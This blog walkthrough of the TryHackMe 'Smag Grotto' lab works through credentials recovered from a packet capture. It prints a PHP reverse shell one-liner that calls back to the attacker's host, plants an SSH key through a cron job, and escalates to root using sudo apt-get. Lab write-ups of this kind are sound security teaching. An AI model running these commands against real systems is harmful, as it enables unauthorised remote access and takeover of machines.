THM - Smag Grotto | An ordinary day

Introduction

Do you remember how to analyse packets?

This is a easy rated box. Let’s begin.

Ports

nmap says we’ve got 22 (SSH) and 80 (HTTP) only.

Webserver

There’s not much on the home page for the website, so we’ll run a quick gobuster:

root@kali:/opt/tryhackme/smag# gobuster dir -u http://10.10.184.160 -w /usr/share/dirb/wordlists/common.txt

This turns up one interesting directory - mail. Checking that we get a message about a packet capture along with a download link. It says you have to download it with wget, although I’m sure that’s not actually necessary. Let’s do it anyway:

root@kali:/opt/tryhackme/smag# wget http://10.10.184.160/aW1wb3J0YW50/dHJhY2Uy.pcap
--2020-07-31 03:52:52--  http://10.10.184.160/aW1wb3J0YW50/dHJhY2Uy.pcap
Connecting to 10.10.184.160:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1209 (1.2K) [application/vnd.tcpdump.pcap]
Saving to: ‘dHJhY2Uy.pcap’

dHJhY2Uy.pcap                        100%[====================================================================>]   1.18K  --.-KB/s    in 0s      

2020-07-31 03:52:53 (29.8 MB/s) - ‘dHJhY2Uy.pcap’ saved [1209/1209]

PCAP

We can open the packet capture in Wireshark and it’s very straightforward, we find a POST request with some important details, being a new subdomain:

http://development.smag.thm/login.php

and some credentials: helpdesk:REDACTED

We add development.smag.thm to our /etc/hosts and continue.

Admin.php

Once we go to development.smag.thm/login.php and authenticate, we get a page that says ‘enter a command’. Any number of commands can be tried but none of them appear to do anything….until you start a listener and try a reverse shell:

php -r '$sock=fsockopen("10.9.10.123",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Thanks, pentestmonkey.

On the box

As usual I run linpeas; this time we find a cron job:

root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys

So the job is copying jake’s public key to the authorized keys file. Good to know.

SSH-keygen

Let’s generate a new SSH key with ssh-keygen:

root@kali:/opt/tryhackme/smag# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa

Once that’s done (with the passphrase of ‘yolo’), we can get it on the box and we can append it to the jake_id_rsa.pub.backup file and wait for the cron job to run.

wget http://10.9.10.123:8000/id_rsa.pub
--2020-07-31 04:17:32--  http://10.9.10.123:8000/id_rsa.pub
Connecting to 10.9.10.123:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 563 [application/octet-stream]
Saving to: 'id_rsa.pub'

id_rsa.pub          100%[===================>]     563  --.-KB/s    in 0s      

2020-07-31 04:17:33 (106 MB/s) - 'id_rsa.pub' saved [563/563]
www-data@smag:/dev/shm$ /bin/cat id_rsa.pub >> /opt/.backups/jake_id_rsa.pub.backup

Jake

Now we can login as jake with our passphrase:

root@kali:/opt/tryhackme/smag# ssh -i id_rsa jake@smag.thm

Running sudo -l gives us this:

jake@smag:~$ sudo -l
Matching Defaults entries for jake on smag:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on smag:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get

And GTFOBins does the rest:

jake@smag:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami
root